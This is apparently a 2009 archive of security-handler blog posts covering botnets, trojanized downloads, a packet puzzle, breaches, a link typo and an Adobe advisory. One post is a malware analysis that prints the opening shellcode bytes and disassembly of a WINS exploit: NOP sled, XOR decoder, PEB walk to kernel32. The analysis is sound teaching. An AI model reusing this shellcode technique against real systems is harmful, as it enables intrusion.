a)      Electronic PHI has been encrypted as specified in the HIPAA Security Rule by "the use of an algorithmic process to transform data into a form in which there is a low probability of assigning meaning without use of a confidential process or key"15 and such confidential process or key that might enable decryption has not been breached. Encryption processes identified below have been tested by the National Institute of Standards and Technology (NIST) and judged to meet this standard.

i)        Valid encryption processes for data at rest are consistent with NIST Special Publication 800-111, Guide to Storage Encryption Technologies for End User Devices.17

ii) Valid encryption processes for data in motion are those that comply with the requirements of Federal Information Processing Standards (FIPS) 140-2. These include, as appropriate, standards described in NIST Special Publications 800-52, Guidelines for the Selection and Use of Transport Layer Security (TLS) Implementations; 800-77, Guide to IPsec VPNs; or 800-113, Guide to SSL VPNs, and may include others which are FIPS 140-2 validated.18

b)      The media on which the PHI is stored or recorded has been destroyed in one of the following ways:

i)                    Paper, film, or other hard copy media have been shredded or destroyed such that the PHI cannot be read or otherwise cannot be reconstructed.

ii)                  Electronic media have been cleared, purged, or destroyed consistent with NIST Special Publication 800-88, Guidelines for Media Sanitization,19 such that the PHI cannot be retrieved.

Guide to Storage Encryption for End User Devices

FIPS 140-2

NIST Special Publications 800-52 - Guidelines for the Selection and Use of Transport Layer Security

Guide to IPsec VPNs

Guide to SSL VPNs

Guidelines for Media Sanitization


Published: 2009-05-07

Botnet hijacking reveals 70GB of stolen data

Thanks to our reader Crill today.  He gave us a heads up on an interesting research project recently conducted at a large university.


It appears that the university infiltrated a Torpig botnet and for 10 days they watched the botnet activity they discovered:

"During the ten days in which they had control of the botnet, the researchers made some interesting observations. Although they recorded more than 1.2 million IP addresses for infected systems, on the basis of unique bot IDs recorded, this turned out to represent only 180,000 systems."

And what did they find:

"Over these ten days Torpig sent large volumes of data to the researchers, including details of 8310 accounts at 410 different financial institutions."

Check out the link for the full report of what they found and more interesting facts. The scary thing is that this is just one of many of these types of botnet's wrecking havoc on the Internet everyday.  I know....  I deal with them continuously due to customer's with infected machines sending massive amounts of spam.  Shut one down and another takes its place.  The joy of the Internet. 




Published: 2009-05-07

Malicious Content on the Web

Today must be a full moon day!  We have had several reports of strange malicious content on otherwise good websites.   One of them is confirmed by Trend Micro.

The first is a fake/Trojanized Windows 7 Release Candidate (RC) build release.  The Trojan is being referred too as TROJ_DROPPER.SPX.  From Trend Micro's Release:

"It is a self extracting executable that contains two executables: one is the original Windows 7 RC build named SETUP.EXE, and the other is CODEC.EXE. Trend Micro detects CODEC.EXE as TROJ_AGENT.NICE. When an unsuspecting user executes the Trojanized setup file, the embedded malware is also executed. As a result, malicious routines of the embedded file are exhibited on the affected system."

The full article can be found at:


The second item is a possible infection your typical  " your computer is infected, click here to scan and clean it" on the usatoday.com website.  We have received more than one report of this but have not been able to confirm. We suspect if it indeed is there that it is an ad somewhere on their site.  Several of the handlers have tried to find the offending ad and have so far been unsuccessful.  We have contacted the appropriate individuals at usatoday.com to advise them of the reports.  

If any of our other readers have seen this type of activity and can tell us what page were on and if a link or an ad was clicked on that triggered it we would like to hear from you so that we can pin point the problem and work with USAToday to get it cleaned up.

Other reports that we have received is that an adware program is being installed on computers when clicking on the link to get the free chicken coupon from Oprah's website.  I have sent an email to the webmaster and have heard nothing back yet.  The scary thing about the chicken coupon is that hundreds of people have downloaded this coupon.  Just think of all of the computers that now have the malware installed.  Again I can't confirm this because I haven't tried to download the coupon and I haven't heard anything back from their webmaster.

If you have any information about this we would like to hear about it too.





Published: 2009-05-07

A packet challenge and how I solved it

Yesterday morning (EDT in the US), our friend Chris Christianson twittered the following:

4500 0036 308b 0000 4001 0000 7f00 0001 7f00 0001 0800 89f3 5a27 0200 3173 7432 444d 6d65 6765 7473 4153 7461 7262 7563 6b73 6361 7264   

I didn't see it in time to win his little challenge, but I figured I'd throw out how I decoded it and how I would have responded had @quine not already beaten me to it.  It was pretty obviously (well, to us packet geeks anyway) an IPv4 packet in hex, so I copied the text and saved it in a text file (though I could have just used echo, but I thought I might want to go back to it) named foocap.txt.  Then I ran the following (note, text2pcap is part of the wireshark package, so that and tcpdump both need to be installed on your linux box to do this):


jac@cantor[531]$ cat foocap.txt | perl -pe 'print "000000 ";s/(..)(..)\s/$1." ".$2." "/ge' | \
text2pcap -e 0x800 - - | tcpdump -Xnnr - 
Input from: Standard input
Output to: Standard output
Generate dummy Ethernet header: Protocol: 0x800
Wrote packet of 54 bytes at 0
Read 1 potential packet, wrote 1 packet
reading from file -, link-type EN10MB (Ethernet)
11:10:08.000000 IP > ICMP echo request, id 23079, seq 512, length 34
    0x0000:  4500 0036 308b 0000 4001 0000 7f00 0001  E..60...@.......
    0x0010:  7f00 0001 0800 89f3 5a27 0200 3173 7432  ........Z'..1st2
    0x0020:  444d 6d65 6765 7473 4153 7461 7262 7563  DMmegetsAStarbuc
    0x0030:  6b73 6361 7264                           kscard


And there it is.  An ICMP echo request that says the first to DM him (via twitter) gets a Starbucks card.  So, my response would have been to take the payload and run it through hping3 to create an echo response packet (or maybe just change the ICMP type, that would have been even simpler).  Of course, I don't drink coffee, but I suppose my daughter could have used the card.  It turns out that (hping3) is how Chris created the original packet anyway, so he probably would have enjoyed getting an echo reply back as the response.  Anyway, he posted about his challenge on his blog, you can find it here: http://ismellpackets.wordpress.com/2009/05/06/packet-challenge/


Published: 2009-05-06

Follow The Bouncing Malware: Gone With the WINS

"Isn't it kind of noisy?", his wife shouted over the roar of the new server's cooling fans.

"It just needs to warm up," he replied, "It'll quiet down in a bit."

His wife pointed at her ears, and shrugged as if to say "I can't hear you" and wandered out of his upstairs office, shaking her head.

She didn't understand.  She never understood.

Joe Sixpack caressed the shiny black case of the server as it sat tipped between his desk and the filing cabinet, tilted at an awkward angle.  It was a beautiful thing, and it had been such a bargain.  He had found it on a whim, wandering through a sale liquidating the assets of a small data processing startup just up the street from his house.  When he asked the bored clerk about it, he had reluctantly dug though an enormous pile of papers and had handed Joe a copy of the machine's original documentation.  The itemized description on the purchase order was pretty much gibberish as far as Joe was concerned, but his eyes were drawn to one phrase in particular: "Operating System: Windows Server 2003."

Never mind the fact that it was a "rackmount" machine, whatever that meant.  It was a SERVER, and that was COOL.  Besides, as a victim of the economic downturn, the company was selling off it's assets at pennies on the dollar.  He had paid only a fraction of what the purchase order said the machine had originally cost.

"Look," the clerk had said as he was writing up a receipt, "if you're thinking of trying to get information off of the hard drive, understand that this thing never actually saw service."  Perhaps it was Joe's blank expression that had prompted him to add, "You understand...this machine is kinda old... it's been sitting on the shelf for a long time... and all sales are final."

Even when he was counting out the money to pay for the machine, Joe wasn't entirely sure what he would use it for.  He had, in the past, kicked around the idea of setting up a server and hosting a website of his own-- maybe he might even start one of those blog things.  He also had an amazingly diverse and extensive collection of porn-- he thought about how cool it would be to start his own "adult site."  On the drive home, he even came up with a name: Sixpack's SexPics.

Despite the clerk's stern warning, the server had powered up just fine and Joe eventually moved it from his desk to what he finally decided was the perfect spot: sitting upright, between the edge of his desk and the filing cabinet.  Unfortunately, he was wrong about the machine quieting down over time-- if anything, as the evening wore on, it seemed to get louder. 

Joe swapped over the monitor, mouse, and keyboard cables from his desktop machine and, after a few false starts (he had never noticed before that the end of a USB cable fit perfectly into a network jack1), was able to get a picture up on the screen.

The clerk had been right: it looked like the machine had never been booted up.  Joe worked his way down through the setup dialog, answering the questions as best he could.  He had to unhook everything and switch back to his desktop machine a couple of times to look up what something meant on Google, but the hassle was worth it when he was finally able to log in as "Administrator."  He was running his own server.

He dug around in the box of stuff that the guy from his ISP had left behind when he installed his Internet service and found what he wanted: a network cable.  He had to move some things around on his desk, but he was finally able to stretch the cable enough to plug it between the back of the server and the back of the router.  The little light on the front of the router instantly lit up and began blinking-- and Joe was pretty sure that was a good sign.  He tried firing up Internet Explorer, and sure enough, he was able to get to Yahoo.com-- his server was connected to the Internet.

Or, it was "sort of" connected.  Joe had spent some time playing with the settings on his router-- so much so that he had to do a hard-reset-- twice now-- but he remembered something interesting that he had seen.  He pointed IE at the IP address of the router and logged in, after looking through the router's manual for the default password (like he would ever change THAT again!).  He clicked around a bit until finally finding the setting he was looking for.  It took him another forty minutes of searching on Google, but he was finally able to figure out how to find the IP address of the new machine and enter it into the router's "DMZ" setting.  It was nearing midnight and he was getting sleepy, so he clicked "OK," truly connecting his server to the Internet.  He switched off the monitor and the lights and went to bed-- a brand new server administrator who was hoping to dream about the photo shoots he would direct for Sixpack's SexPics.

But, while Joe was drifting off to dreams of the "action" in his first big photo shoot, something eerily similar was happening to the freshly minted Sixpack's SexPics' server.  A fun and interesting conversation was taking place on port 42/TCP between Joe's "new" machine (a machine that had been sitting on a shelf when Microsoft released MS04-045) and another machine somewhere in Korea.


  1. They do.  But don't try it.  Really.  This means you.  Yes you.  Don't look at me like that.  You know that you're just sitting there, fighting the urge to go try it-- acting all nonchalant, like you don't care. It's slowly eating away at you.  We both know that you're trying to think of something... anything else... just to keep your mind off of wanting to rip the nearest USB cable out its jack so you can go check to see if I'm telling you the truth.  But I am.  I am.  Would I lie to you? 

It Happened One Night

At this point in most of the other FTBM postings, I would-- in a rare display of lucidity-- take a moment to step aside from my normally disjointed prose to warn you, my dear reader, of the perils of embarking on any attempt to "play around" with the malicious code we're about to examine.  Having discovered, over these many years, that none of you actually pay one damn bit of attention to what I say, I've decided to say "t'hell with it..."  Have fun! Launch the malware! Run with scissors!  Play with matches!  Swim right after eating!  Don't wear clean underwear, you'll never be in an accident!  Your mother was WRONG!

(Ok, jus' so you know... the running-with-scissors thing sorta freaks me out... so don't.  And don't play with matches-- you'll tick off the people at chemistry.com.  But, that being said, if you really wanna eat a big, honkin' meal, put on your dirtiest underwear, and go swimming-- be my guest.  Just tell me what pool you were in so I can avoid it like the plague.)

The impetus for this new, malwarerific installment was the "compromise" of a honeypot machine that I run.  Thus, if you found the whole "backstory" of Joe Sixpack gettin' him some "server" to be a bit contrived, you're probably right.  And you can bite me.  Everybody's a critic...

Two vulnerabilities in the WINS service (Windows Internet Naming Service - a service that maps IP addresses to NetBIOS computer names and vice versa) were first described by Microsoft in the MS04-045 bulletin, released on December 14, 2004.  Now if you're saying, "Tom, that's ancient history!  No one would STILL be vulnerable to that!", I would first tell you that you don't know me well enough to call me "Tom"-- it's "Mr. Liston" to you-- and then I would mock you heartily and ask you what Internet you've been hanging out on lately.  My honeypot got hit two weeks ago: and if it was the only machine on the Internet that was vulnerable, do you think the kiddyz would still be lookin'?

The crux of the vulnerability that will be 'sploited on Joe's machine is an issue with how the WINS service deals with information that is exchanged as part of what is known as "WINS Replication"-- a feature of the WINS service that allows multiple WINS servers to keep their information synchronized.  Think of it as DNS "zone transfers" being done in a... well... a pretty dumb way.  The stupidity comes from the fact that in WINS Replication, the server actually sends the client a record that contains memory pointers (a value that says to the client, "hey, you need to go this far forward or backward in this chunk of memory to find this particular information").  Compound that stupidity by the fact that on an unpatched machine, ain't nobody checkin' to see that the memory pointer received isn't pointing somewhere outside of the data being sent.  The upshot: a specially crafted WINS Replication packet can be used by an attacker to hijack the memory pointer, overflow a buffer, and execute arbitrary code on a vulnerable machine.

Just so you're aware, we're about to embark on a rather high-speed journey deep into the innards of a malware attack.  Like all cool suff, some assembly may be required.  Please keep your arms and legs inside the car and do not unfasten your safety harness until the ride has come to a complete stop.

(Assembly language purists out there... I cut some corners in the following to keep this at a level where -- hopefully -- everyone can follow along.  Forgive me.)


When the Korean server hits the Sixpack's SexPics server, it fires over a series of specially crafted WINS Replication packets, designed to diddle with the memory pointers used by the WINS service. Being a mindless piece of code, the WINS service takes the bogus memory pointers, does exactly what it they tell it to do, and overwrites a chunk of it's own memory.  The WINS service ends up getting whacked because it trusts the data that it is sent-- and that trust ends up being betrayed-- which leads to it eventually executing the attacker's code buried deep inside that data.  Let's take a look at the hexidecimal representation of the beginning of that code:

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 EB 10 5A 4A 33 C9 66 B9 77 01 80 34
0A 99 E2 FA EB 05 E8 EB FF FF FF CD 12 75 1A 75
B1 12 6D 71 60 99 99 99 10 9F 66 AF F1 17 D7 97
75 71 9D 98 99 99 10 DF 9D 66 AF F1 EB 67 2A 8F

Right up front, we notice a pretty long string of hex 90's... let's talk a little about why that's there.  Overwriting memory and overflowing buffers to execute code isn't what you would call an "exact" science.  There are differences in architectures (i.e. having the words in a program be in different language will change the exact layout of the code... also, there are different versions of code on different versions of operating systems, etc...) so there's a little "slop" in even the most calculated attack.  Those hex 90's make up what we in the biz call a "NOP Sled."  The idea is this: when the attacker overwrites memory, due to the differences in the various classes of machines that they're attacking, they may not be entirely sure of where their overwritten memory will land.  So, rather than having an exact point to jump to when they want to execute their code, the attackers create a little "cushion" for themselves.  Those hex 90s represents a special instruction on the x86 architecture called the NOP (pronounced "NO-OP").  That instruction does pretty much what it sounds like it does: nothing-- it exists, primarily, to allow for padding and synchronization within programs.  The really cool thing about the NOP instruction is that, in addition to doing nothing, it is only one byte long (most x86 instructions require multiple bytes).  By placing a field of NOP instructions in front of the code that they want to execute, the attacker needs only to land "somewhere" in that field to ensure that he will eventually land at the correct starting point for his malicious code.  The execution, in essence, "slides" down the sled right to the place where the attacker's code is waiting.

Any Number Can Play

So, at the bottom of our NOP sled, what do we find?  Looking at the code in a disassembler, we see this:

00000458                 jmp     short loc_46A
0000045A ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
0000045A sub_45A         proc near        ; CODE XREF: sub_45A+10 p
0000045A                 pop     edx
0000045B                 dec     edx
0000045C                 xor     ecx, ecx
0000045E                 mov     cx, 177h
00000462 loc_462:                         ; CODE XREF: sub_45A+C j
00000462                 xor     byte ptr [edx+ecx], 99h
00000466                 loop    loc_462
00000468                 jmp     short loc_46F
0000046A ; --------------------------------------------------------
0000046A loc_46A:                         ; CODE XREF: 00000458 j
0000046A                 call    sub_45A
0000046F loc_46F:                         ; CODE XREF: sub_45A+E j
0000046F                 int     12h

The hex numbers at the left (and the other "location" references) represent an offset into the data that I pulled from the attack.  The first instruction that we run into at the bottom of the NOP slide tells us to jump ahead (JMP) to location 0x46A.  Looking there, we see that the code "calls" a subroutine (another chunk of code), at location 0x45A.  Let's take a look at what that subroutine does.

The first thing that the subroutine does is perform a POP operation.  To understand what the POP instruction does, you need to know a little about a programming structure known as "the stack."  The stack is a temporary storage area that your computer's processor uses to hold onto values with a fairly limited lifetime.  If you've ever gone through the line at a cafeteria, you might remember a magical device that holds a big stack of plates and yet somehow, whenever you remove one, another one pops up to take it's place.  If you put the plate you just took back on the stack, it somehow, remarkably, adjusts itself so that the plates sink below it, leaving your plate right back where it started. (Note: Yes, I'm easily amused...)  Well, that "stack" of plates is an incredibly good analogy for the "stack" used by a computer processor.  We "PUSH" values onto the stack and we then "POP" them back off again.  Remember, however, just like in a cafeteria, even if the top plate isn't the one you want (you know the one... all crusty with some sort of unidentifiable goo), you can't get to the one below it, without taking the yucky one off first.  Thus, like the stack in the computer, the plate stack is a "Last In, First Out" (or "LIFO") stack.

So, if our first action upon hitting the malicious code is to "call" a subroutine, what's on the stack?  We're popping a value out, but we didn't push a value in there to begin with!  Ah... here is where it's important to know and understand a little bit about what goes on behind the scenes when you "call" a subroutine.  Remember, when I said that the stack was used for temporary storage?  Well, not only do programmers explicitly use the stack for storing values temporarily, but the processor itself uses the stack as well.  When we "call" a subroutine, we're actually asking the processor to temporarily suspend the current "flow" of the program and to go off and do something else for a bit.  When its done doing that "something else," we expect that it will return to the original program flow.  But how does the processor know where to go back to?  It uses the stack to store a temporary value, pointing back to the instruction that it should return to when the work of the subroutine is finished.  Think of it like this: you're reading along in a book (this is the normal program flow...), and you get a phone call (the program "calls" a subroutine).  What do you do?  You use a bookmark, to save your location in the book...  or, if you're a cretin, you fold down the corner of the page.  When you're done with the phone call (the subroutine finishes), you go back to your place in the book.

In this case, the malware author needs to find out where his code is.  Remember, we talked earlier about using a NOP sled to get around not having exact knowledge about the location of the code, but now we really need to firm up our grasp of where, EXACTLY, we are, and there ain't no binary-level Tom-Tom (me-me) available.  So what's a locationally-challenged malware author to do?  Call a subroutine and steal the processor's "bookmark" off of the stack!  We see that, immediately after entering the subroutine, the code pops a value off of the stack into the register EDX (registers are another temporary storage location upon which the processor is able to perform various operations...).  It then decrements (DEC) that value by one and voila! We now have a pointer to the exact memory location where we came from. 

Having done all of that, the code then XORs the value in another register, ECX, with itself.  XOR?

The XOR function is pretty simple, actually.  It's a bit-wise operation, meaning that it takes two numbers and compares them at the bit level.  If the bits match, then, in the resulting value, that bit is turned "off" (0).  If the bits are different, then that bit will be turned "on" (1) in the resulting value.  So, if you XOR any number with itself, the resulting value has every bit turned off (really... think about it...).  So, XORing a register with itself is simply a fast way for the code to completely clear the register.  Another interesting result of the XOR function is that, if you take any number, XOR it with any other value (we'll call that value the "key"), and then XOR the result with the "key" value again, you get back the original number.  Pretty cool, eh?  XORing is a cheap and dirty (and easily broken) means of "encrypting" things. (And double-XOR encryption is... well... a joke.)

Having cleared out the ECX register, the code then loads it up with 0x177 (that's 375 in decimal...) and then proceeds to use that value plus the "bookmark" location it stole off the stack (in EDX) as an offset for which to begin XORing memory values with 0x99 (153 decimal). 

What the heck?

Remember when I said that XOR could be used as cheap and dirty "encryption"?  Well, that's exactly what they've done here.  They've "encrypted" their code (using 0x99 as their "key" -- nothing special about it, any number will do) and now they're decrypting it.  The "LOOP" operation in the following step decreases the value in ECX by one-- and then, if ECX isn't yet zero, it loops back to 0x462, otherwise, it continues on.  This will result in "decrypting" 375 bytes of code.

Let's see what we find in that code...

Key to the City

"But Tom," I hear you cry, "the code is encrypted!  How will you ever be able to look at it?"  Putting aside, for the moment, our recent discussion on "familiarity," I'll explain that, while the code is "encrypted," it's not really trying hard enough to keep me (or anyone else for that matter) out.  The reason that malware authors XOR "encrypt" their stuff is to keep IDS systems from easily recognizing specific code signatures as they fly by.  I already have the "key," it was sitting right out there in the open before... 0x99.  So all I need to do is to write myself a short program that will use that "key" to "unlock" the real, unencrypted code. And so, 4.5 minutes (I timed it...) of C coding, compiling, fixing a damned missing semicolon (why, if the compiler is smart enough to tell me EXACTLY where the missing semicolon goes, doesn't it just PUT it there for me?), and compiling again, and I have some newly "decrypted" code in front of me.

Let's see here...

0000046F                 push    esp
00000470                 mov     ebp, esp
00000472                 sub     esp, 28h
00000475                 mov     esi, esp
00000477                 call    sub_575

The code starts off by pushing the value of the stack pointer (a register that holds the memory location of the top "plate" in the stack) onto the stack.  It then copies it to another register (EBP), and then subtracts 0x28 (40 decimal) from the value and saves that to another register (ESI) as well.  Why?  Well, the malicious code is creating it's own new chunk o' stack space where it can do its work without disturbing the real stack... Hopefully, before everything is said and done, it'll put everything back in place so that the WINS service will be able to carry on about its business as though nothing untoward had happened.  After doing all of that, it then jumps off into another subroutine.

00000575 sub_575         proc near     
00000575                 push    ebp
00000576                 push    esi
00000577                 mov     eax, fs:30h
0000057D                 mov     eax, [eax+0Ch]
00000580                 mov     esi, [eax+1Ch]
00000583                 lodsd
00000584                 mov     ebp, [eax+8]
00000587                 mov     eax, ebp
00000589                 pop     esi
0000058A                 pop     ebp
0000058B                 retn    4
0000058B sub_575         endp

Holy crud! What the heck is that?

Well that, my dear reader, is the means by which the malcode finds some much-needed information.  Let's walk through it... To begin with, whenever you start a subroutine, before you screw up the contents of any of the registers you might need later, you always want to save the information that's in them. Later, as you exit the subroutine, you can put things back in place.  To that end, you'll notice that the code pushed some values onto the stack at the beginning of the subroutine and then pulls them off (in the opposite order... remember LIFO!) at then end.  Having done that, we then see a really funky looking instruction: mov eax, fs:30h.  To understand what's happening here, you need to understand a little bit about something called the Windows Process Environment Block (PEB).  


The Process Environment Block is a memory-based data structure that contains all sorts of interesting user-writable information on the running process.  For you programming-types out there, here is the structure of the PEB:

typedef struct _PEB {
BOOLEAN InheritedAddressSpace;  //0x00
BOOLEAN ReadImageFileExecOptions;  //0x02
BOOLEAN BeingDebugged;  //0x04
BOOLEAN Spare;   //0x06
HANDLE Mutant;   //0x08
PVOID ImageBaseAddress; //0x0A  
PPEB_LDR_DATA LoaderData; //0x0C
PVOID SubSystemData;
PVOID ProcessHeap;
PVOID FastPebLock;
ULONG EnvironmentUpdateCount;
PPVOID KernelCallbackTable;
PVOID EventLogSection;
PVOID EventLog;
ULONG TlsExpansionCounter;
PVOID TlsBitmap;
ULONG TlsBitmapBits[0x2];
PVOID ReadOnlySharedMemoryBase;
PVOID ReadOnlySharedMemoryHeap;
PPVOID ReadOnlyStaticServerData;
PVOID AnsiCodePageData;
PVOID OemCodePageData;
PVOID UnicodeCaseTableData;
ULONG NumberOfProcessors;
ULONG NtGlobalFlag;
BYTE Spare2[0x4];
LARGE_INTEGER CriticalSectionTimeout;
ULONG HeapSegmentReserve;
ULONG HeapSegmentCommit;
ULONG HeapDeCommitTotalFreeThreshold;
ULONG HeapDeCommitFreeBlockThreshold;
ULONG NumberOfHeaps;
ULONG MaximumNumberOfHeaps;
PPVOID *ProcessHeaps;
PVOID GdiSharedHandleTable;
PVOID ProcessStarterHelper;
PVOID GdiDCAttributeList;
PVOID LoaderLock;
ULONG OSMajorVersion;
ULONG OSMinorVersion;
ULONG OSBuildNumber;
ULONG OSPlatformId;
ULONG ImageSubSystem;
ULONG ImageSubSystemMajorVersion;
ULONG ImageSubSystemMinorVersion;
ULONG GdiHandleBuffer[0x22];
ULONG PostProcessInitRoutine;
ULONG TlsExpansionBitmap;
BYTE TlsExpansionBitmapBits[0x80];
ULONG SessionId;

Notice that the PEB contains all sorts of information that might be of use to a chunk of code that just found itself being executed inside of a process on a machine and in an environment that it knows little to nothing about (hey... lookie there: OSMajorVersion, OSMinorVersion, OSBuildNumber, OSPlatformID...).  The address of the PEB itself can always be found on Windows (>=NT) by loading it from fs:30h (why that's so is beyond the scope of this article... but trust me...). So, once we've loaded up the location of the PEB, we see that the code is looking at a particular location offset into the PEB itself-- in fact, it's looking at a location 0x0C (12 decimal) from the beginning of the PEB structure. The offset from the beginning of the structure is referenced above, so we can see that offset 0x0C is a pointer to something called "LoaderData," which is itself, another in-memory data structure.

The LoaderData structure looks like this:

typedef struct _PEB_LDR_DATA {
ULONG Length; //0x00
BOOLEAN Initialized; //0x04
PVOID SsHandle; //0x08
LIST_ENTRY InLoadOrderModuleList; //0x0C
LIST_ENTRY InMemoryOrderModuleList; //0x14
LIST_ENTRY InInitializationOrderModuleList; //0x1C

Steppin' on along, we see that what we're really looking for is again, something offset into this particular structure... actually something at offset 0x1C (28 decimal) (Note: I'm getting these offsets by looking at what is being added to EAX at each step).  Those LIST_ENTRIES actually contain two memory pointers, and make up what is known as a doubly linked list-- the first pointer is to the "previous" module and the second to the "next" module. So the 28 byte offset points us to the LIST_ENTRY for the "InInitializationOrderModuleList."  Each entry in that list points to the InInitializationOrderModuleList entry in a listing of these structures:

typedef struct _LDR_MODULE {
LIST_ENTRY InLoadOrderModuleList;
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
PVOID BaseAddress;
PVOID EntryPoint;
ULONG SizeOfImage;
ULONG Flags;
SHORT LoadCount;
SHORT TlsIndex;
LIST_ENTRY HashTableEntry;
ULONG TimeDateStamp;

and this linked list, strings together all of the information for the modules (.DLL files) in their initialization order.  The first module initialized for ANY Windows program is... kernel32.dll. The LODSD operand then loads the address pointed to in ESI into EAX..., and we then bump that by 8 bytes to point to the "BaseAddress" entry...

So, what do all of these machinations accomplish?  Well, when you're an evil piece o' malware, and you would like to use any of the nice functions provided to you by the operating system under Windows, you've got a problem.  Normally, when a piece of software loads and runs under Windows, the Windows Loader takes care of things like loading DLLs and fixing up the program's import table so that the functions that you use from kernel32.dll or user.dll, etc... all just automatically work.  For evil malware exploiting a vulnerability to run itself as part of a vulnerable process, such niceties aren't available... worse still, you don't really even have a way to find something like GetProcAddress so you can load up imports yourself.  What we have here is a nifty way to find the BaseAddress of kernel32.dll... and that's exactly what's in EAX when this subroutine returns.

Another way of looking at this is that, in the code we're looking at, the PEB chains us to the LoaderData, and the LoaderData chains us to module information, which chains us to the BaseAddress of kernel32.dll...  Now the malware needs to move from knowing the BaseAddress of kernel32.dll to being able to call the functions that it needs to make Joe's life miserable...

So, at this point, our evil code has managed to insinuate itself into our running process (the WINS service) and has found the BaseAddress of the kernel32.dll file... and... well, 'splainin' all of this has pretty much worn me out...

So, how about if we both take a break and take this up again in the next installment?

And, because I absolutely love getting a bunch of you to write in and annoy the next Handler on Duty (hi Deb!), I've been dropping some hints pointing towards a particular person throughout my ramblings... anyone know who that is?

Tom Liston - InGuardians - Handler on Duty
Follow me on Twitter

P.S.: For Adrien- Oompah Loompahs!


Published: 2009-05-05

Health database breached

The wikileaks.org web site, which is a pretty famous repository of "leaked" documents that were never supposed to see light, is reporting about a supposedly large security breach of the Virginia Prescription Monitoring Program (VPMP). According to the web site and other sources around the web, the web site was defaced by an unknown hacker that left a ransom note asking for 10 million US$ in order to return the data.

According to the hacker, he acquired records on more than 8 million patients. The records include prescription data as well as patient's name, age, address, SSN and drivers license number.

Now, while this all has not been verified, there are couple of things we can already see. First of all, the hacker definitely managed to compromise the web site because the front end web page was modified. According to the message left by the hacker, he also deleted the backups (now, this raises some eyebrows, doesn't it?).

If this all is correct, it indicates that several protection layers failed at the VPMP. Without knowing more details we can't say if the web application was good or bad (maybe the hacker got access through a different vulnerability), but one thing that should never happen is ability for a hacker to delete your backups. And indeed, any decent backup system will only allow you to backup the data or read it – only the backup administrator should be able to delete the backups.

We'll see how things will develop here and update the diary if we get more information.


Published: 2009-05-05

New version (v 1.4.2) of BASE available

While there isn't a writeup in the site's "news" section, I've confirmed with fellow InGuardian and BASE project-lead, Kevin Johnson, that there is indeed a new version (v 1.4.2) of BASE available.  If you're not familiar with it, BASE is a web interface to perform analysis of network intrusion data gathered by Snort.  You can download the latest version here.

Tom Liston - InGuardians - ISC Handler


Published: 2009-05-05

Every dot matters

Couple of days ago, one of our readers, Lee Dickey, reported a strange behavior of a link on Microsoft's Technet web page with information about SP2 for Vista. At first look, it appeared that a web page hosted by Microsoft was compromised as it redirected the browser to an external web site which was simply some kind of a search engine.

The screenshot of the page is shown below, can you spot the error?


That's right – a dot is missing between technet and microsoft.com, so the link actually pointed to technetmicrosoft.com, which is a domain registered by someone in the USA as easily checked with WHOIS.

So what happened here? Nothing malicious – it was simply an error by someone at Microsoft or a typo, however, what should be stressed out is the importance of link validation – if the owner of the technetmicrosoft.com domain was malicious, he could have done some serious damage. Luckily, Lee notified Microsoft as well and this was fixed quickly.



Published: 2009-05-04

Adobe Reader/Acrobat Critical Vulnerability

A critical vulnerability has been discovered in the JavaScript handling within Adobe Reader and Acrobat versions 9.1 and earlier.  According to the announcement, Adobe expects to make available Windows updates for Adobe Reader versions 9.X, 8.X, and 7.X and Acrobat versions 9.X, 8.X, and 7.X, Macintosh updates for Adobe Reader versions 9.X and 8.X and Acrobat versions 9.X and 8.X, as well as Adobe Reader for Unix versions 9.X and 8.X, by May 12th, 2009.  Additionally, there is a second vulnerability specific to Adobe Reader for Unix that will be resolved by this update as well.

In the meantime, you can perform mitigation steps by disabling JavaScript in Reader and Acrobat:

  1. Launch Acrobat or Adobe Reader.
  2. Select Edit>Preferences
  3. Select the JavaScript Category
  4. Uncheck the ‘Enable Acrobat JavaScript’ option
  5. Click OK


Remember back when we used to tell people to PDF documents because it was safer than dealing with MS Office?

(Thanks to "roseman" for the tip...)

Tom Liston - InGuardians - Handler on Duty


Published: 2009-05-04

Putting the ED _back_ in .EDU

The Internet is a wonderful thing.  Think of all the ways it has changed how we do things. Over the weekend, I needed to find some information on a particularly nasty weed we had growing in our woods.  Back in the day, it would have entailed a trip to the local library and a pretty good possibility of not finding anything at all.  Now, all I need is a little bit of Google-Fu, and I was able to find a web page with way more information on this plant than I ever wanted.

There are web pages out there for EVERYTHING (thus Rule #34), and at this point, pretty much anyone can stand up a website.  Take a course or two at the community college, shell out a few bucks for an "HTML for Dummies" book, and heck, you're a "web designer."

Therein lies the problem.

Knowing how to "design" a page o' dancing gerbils does not a secure site make. (<-- Note: while grammatically correct, like Yoda do I sound...) Once you've mastered the fine art of the <blink> tag, you need to actually check your site to make sure that one of the evil denizens of the 'net hasn't altered your masterpiece.

In the brilliant precursor to this sequel, I tried to point out a little bit o' Google-dorking that found some really interesting things on the sites of various institutions of higher learning.  This time around, I'll throw some .gov sites under the bus as well.

Try tossing the following query at big-G: "site:.edu filetype:html buy viagra"

Last time I did this, I didn't name names... but I'm older and more curmudgeonly now, so here is a cross-section of some of the .edu sites that made the "little blue pill" hit parade:

  • The Division of Social Sciences at UC Santa Cruz
  • The Space Systems Simulation Laboratory at Virginia Tech
  • Indiana University-Purdue University Fort Wayne
  • The University of Tennessee - Knoxville
  • The Biology Department (how fitting!) at the University of Central Florida
  • The University of Khartoum (ev1l h@x0rs don't just whack universities in the U.S.)
  • The Northern Marianas College (see...)
  • etc..., etc..., etc...

What's kinda' cool is that since Google takes some time to "forget," you can also see the folks who WERE whacked for long enough to get spidered by the Google bot, but have since cleaned things up.

